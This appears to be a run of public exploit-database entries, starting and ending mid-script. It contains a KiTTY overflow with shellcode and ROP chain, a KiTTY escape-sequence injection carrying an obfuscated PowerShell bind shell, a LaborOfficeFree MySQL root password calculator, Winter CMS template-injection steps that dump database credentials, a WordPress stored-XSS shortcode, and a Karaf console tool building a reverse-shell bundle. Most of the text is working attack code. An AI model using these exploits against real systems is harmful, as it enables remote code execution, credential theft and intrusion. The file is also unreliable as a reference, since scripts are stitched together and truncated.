buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"
def shellcode():
sc = b''
sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444
sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444
sc += b'\x29\xD8' # sub eax,ebx
sc += b'\x29\xC4' # sub esp,eax
sc += buf
sc += b'\x90' * (1042-len(sc))
assert len(sc) == 1042
return sc
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe]
#[---INFO:gadgets_to_set_ebp:---]
0x00429953, # POP EBP # RETN [kitty.exe]
0x005405b0, # PUSH ESP; RETN 0 [kitty.exe]
#[---INFO:gadgets_to_set_ebx:---]
0x0049d9f9, # POP EBX # RETN [kitty.exe]
0x00000201, # 0x00000201-> ebx
#[---INFO:gadgets_to_set_edx:---]
0x00430dce, # POP EDX # RETN [kitty.exe]
0x00000040, # 0x00000040-> edx
#[---INFO:gadgets_to_set_ecx:---]
0x005ac58c, # POP ECX # RETN [kitty.exe]
0x004d81d9, # &Writable location [kitty.exe]
#[---INFO:gadgets_to_set_edi:---]
0x004fa404, # POP EDI # RETN [kitty.exe]
0x005a2001, # RETN (ROP NOP) [kitty.exe]
#[---INFO:gadgets_to_set_eax:---]
0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe]
0x90909090, # nop
0x41414141, # Filler (compensate)
#[---INFO:pushad:---]
0x005dfbac, # PUSHAD # RETN [kitty.exe]
]
return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#----------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d #
# Return Address Information: 0x00529720 : {pivot 324 / 0x144} : #
# ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN #
# ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE} #
# Shellcode size at ESP: 1042 bytes #
#----------------------------------------------------------------------------------#
return_address = struct.pack('<I', 0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain_padding = b'\x90' * 27
nops = b'\x90' * 88
escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
escape_sequence += nops + b'\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
# Exploit Title: KiTTY 0.76.1.13 - Command Injection
# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/=
# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: CVE-2024-23749
#-------------------------------------------------------------------------------------#
# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
#-------------------------------------------------------------------------------------#
# msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler #
# [*] Payload Handler Started as Job 1 #
# msf6 payload(cmd/windows/powershell_bind_tcp) > #
# [*] Started bind TCP handler against 192.168.100.28:4444 #
# [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) #
#----------------------------------------------------------------------------------------#
import os
import sys
#-----------------------------------------------------------------#
# msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw #
#-----------------------------------------------------------------#
shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create'
shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G'
shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa'
shellcode += b'se64String(((\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey'
shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\'+\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh'
shellcode += b'kvUBgYPA3APsGG\'+\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4'
shellcode += b'jBeXa\'+\'QgRGld\'+\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1'
shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\'+\'AFWMm85{2}gI/hVGUK'
shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\'+\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM'
shellcode += b'8kWhDlXHr\'+\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB'
shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f'
shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0'
shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\'+'
shellcode += b'\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\'+'
shellcode += b'\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\'+\'1Txf3SQJhG8E/BlNRyY'
shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\'+\'T3Ztk3Tt{2}2'
shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+'
shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k'
shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\'+\'IyoERfSimrYbXTGP{1}g1Jc'
shellcode += b'7\'+\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL'
shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve'
shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\')-f'
shellcode += b'\'=\',\'9\',\'O\')))),[System.IO.Compression.CompressionMode]::Decompr'
shellcode += b'ess))).ReadToEnd()))\"'
escape_sequence = b'\033]0;__rv:'
escape_sequence += b'" & '
escape_sequence += shellcode
escape_sequence += b' #\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
# Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346
# Google Dork: N/A
# Date: 09/02/2023
# Exploit Author: Peter Gabaldon - https://pgj11.com/
# Vendor Homepage: https://www.laborofficefree.com/
# Software Link: https://www.laborofficefree.com/#plans
# Version: 19.10
# Tested on: Windows 10
# CVE : CVE-2024-1346
# Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable.
"""
After installing LaborOfficeFree in testing lab and revesing the backup process, it is possible to determine that it creates a "mysqldump.exe" process with the root user and the password being derived from the string "hola" concated with "00331-20471-98465-AA370" (in this case). This appears to be the license, but it is different from the license shown in the GUI dashboard. This license has to be extracted from memory. From example, attaching a debugger and breaking in the mysqldump process (for that, admin rights are NOT needed).
Also, the app checks if you are an admin to perform the backup and fails if the program is not running as adminsitrator. But, this check is not effective, as it is actually calling mysqldump with a derived password. Thus, administrator right are not needed.
Here is the disassembly piece of the procedure in LaborOfficeFree.exe responsible of calculating the root password.
00506548 | 53 | push ebx | Aqui se hacen el XOR y demas que calcula la pwd :)
00506549 | 56 | push esi |
0050654A | A3 7CFD8800 | mov dword ptr ds:[88FD7C],eax | eax:"hola00331-20471-98465-AA370"
0050654F | 0FB7C2 | movzx eax,dx | eax:"hola00331-20471-98465-AA370"
00506552 | 85C0 | test eax,eax | eax:"hola00331-20471-98465-AA370"
00506554 | 7E 2E | jle laborofficefree.506584 |
00506556 | BA 01000000 | mov edx,1 |
0050655B | 8B1D 7CFD8800 | mov ebx,dword ptr ds:[88FD7C] |
00506561 | 0FB65C13 FF | movzx ebx,byte ptr ds:[ebx+edx-1] |
00506566 | 8B31 | mov esi,dword ptr ds:[ecx] |
00506568 | 81E6 FF000000 | and esi,FF |
0050656E | 33DE | xor ebx,esi |
00506570 | 8B1C9D A40B8800 | mov ebx,dword ptr ds:[ebx*4+880BA4] |
00506577 | 8B31 | mov esi,dword ptr ds:[ecx] |
00506579 | C1EE 08 | shr esi,8 |
0050657C | 33DE | xor ebx,esi |
0050657E | 8919 | mov dword ptr ds:[ecx],ebx |
00506580 | 42 | inc edx |
00506581 | 48 | dec eax | eax:"hola00331-20471-98465-AA370"
00506582 | 75 D7 | jne laborofficefree.50655B |
00506584 | 5E | pop esi |
00506585 | 5B | pop ebx |
00506586 | C3 | ret |
The result number from this procedure is then negated (bitwise NOT) and casted as a signed integer. Note: the address 0x880BA4 stores a constant array of 256 DWORDs entries.
005065C8 | F755 F8 | not dword ptr ss:[ebp-8] |
Running this script produces the root password of the LaborOfficeFree MySQL.
C:\Users\***\Desktop>python myLaborRootPwdCalculator.py
1591779762
C:\Users\***\Desktop>
"""
#! /usr/bin/python3
from operator import xor
import ctypes
if __name__ == "__main__":
magic_str = "hola00331-20471-98465-AA370"
mask = 0x000000ff
const = [0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DDDE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3DD895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x0DD0D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9DD277AF,0x4DB2615,0x73DC1683,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x67DD4ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506DD,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68DDB3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D70DD2EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0CDD70693,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D]
result = 0xffffffff
for c in magic_str:
aux = result & mask
aux2 = xor(ord(c), aux)
aux3 = xor(const[aux2], (result >> 8))
result = aux3
result = ~result
result = ctypes.c_long(result).value
print(result)
# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Author: tmrswrr
# Date: 12/05/2023
# Vendor: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter/releases/v1.2.2
# Vulnerable Version(s): 1.2.2
#Tested : https://www.softaculous.com/demos/WinterCMS
1 ) Login with admin cred and click CMS > Pages field > Plugin components >
https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
2 ) Write SSTI payload : {{7*7}}
3 ) Save it , Click Priview :
https://demos6.demo.com/WinterCMS/demo/plugins
4 ) You will be see result :
49
Payload :
{{ dump() }}
Result :
"*::database" => array:4 [▼
"default" => "mysql"
"connections" => array:4 [▼
"sqlite" => array:5 [▼
"database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"
"driver" => "sqlite"
"foreign_key_constraints" => true
"prefix" => ""
"url" => null
]
"mysql" => array:15 [▼
"charset" => "utf8mb4"
"collation" => "utf8mb4_unicode_ci"
"database" => "soft_pw3qsny"
"driver" => "mysql"
"engine" => "InnoDB"
"host" => "localhost"
"options" => []
"password" => "8QSz9(pT)3"
"port" => 3306
"prefix" => ""
"prefix_indexes" => true
"strict" => true
"unix_socket" => ""
"url" => null
"username" => "soft_pw3qsny"
]
"pgsql" => array:12 [▶]
"sqlsrv" => array:10 [▶]
]
"migrations" => "migrations"
"redis" => array:4 [▼
"client" => "phpredis"
"options" => array:2 [▼
"cluster" => "redis"
"prefix" => "winter_database_"
]
"default" => array:5 [▼
"database" => "0"
"host" => "127.0.0.1"
"password" => null
"port" => "6379"
"url" => null
]
"cache" => array:5 [▼
"database" => "1"
"host" => "127.0.0.1"
"password" => null
"port" => "6379"
"url" => null
]
]
]
]
Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811)
Date: 18 December 2023
Exploit Author: Faiyaz Ahmad
Vendor Homepage: https://wordpress.com/
Version: 4.23.3
CVE : CVE 2023-4811
Proof Of Concept:
1. Login to the wordpress account
2. Add the following shortcode to a post in "File Upload Plugin":
[wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"]
3. Upload any file on the resulting post.
4. After the upload completes, you will see the XSS alert in the browser.
#!/usr/bin/python
# Exploit Title: [Karaf v4.4.3 Console RCE]
# Date: [2023-08-07]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
# VisionSpace Technologies GmbH]
# Exploit Repository:
# [https://github.com/visionspacetec/offsec-karaf-exploits.git]
# Vendor Homepage: [https://karaf.apache.org]
# Software Link: [https://karaf.apache.org/download.html]
# Version: [4.4.3]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
# python exploit.py --help
#
# Example:
# python exploit.py --rhost=192.168.0.133 --rport=1337 \
# --lhost=192.168.0.100 --lport=4444 \
# --creds=karaf:karaf
"""
This tool will let you open a reverse shell from the system
that is running Karaf Console",
"""
import argparse
import base64
import io
import re
import zipfile
import requests
# Content of the MANIFEST.MF file.
MANIFEST_CONTENT = \
"Bundle-Name: RevShell\n" \
"Bundle-Description: Bundle openning a reverse shell connection.\n" \
"Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator\n" \
"Bundle-Vendor: VisionSpace\n" \
"Bundle-Version: 1.0.0\n" \
"Import-Package: org.osgi.framework\n" \
"Bundle-Activator: com.visionspace.osgi.revshell.Activator"
# Activator.class bytecode template.
ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \
b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \
b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \
b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \
b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \
b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \
b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \
b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \
b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \
b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \
b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \
b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \
b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \
b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \
b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \
b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \
b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \
b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \
b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \
b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \
b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \
b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \
b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \
b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \
b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \
b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \
b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \
b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \
b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \
b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \
b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \
b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \
b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \
b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \
b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \
b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \
b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \
b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \
b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \
b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \
b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \
b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \
b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \
b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \
b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \
b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \
b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \
b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \
b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \
b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \
b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \
b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \
b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \
b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \
b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \
b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \
b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \
b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \
b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \
b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \
b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \
b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \
b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \
b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \
b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \
b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \
b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \
b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \
b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \
b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \
b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \
b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \
b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \
b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \
b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \
b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \
b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \
b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \
b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \
b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \
b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \
b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \
b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \
b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \
b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \
b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \
b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \
b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \
b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \
b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \
b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \
b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \
b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \
b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \
b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \
b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \
b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \
b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \
b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \
b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \
b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \
b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \
b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \
b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \
b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \
b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \
b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \
b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \
b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \
b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \
b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \
b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \
b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \
b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \
b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \
b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \
b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \
b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \
b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \
b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \
b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \
b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \
b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \
b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \
b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \
b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \
b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \
b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \
b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \
b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \
b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \
b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \
b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \
b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \
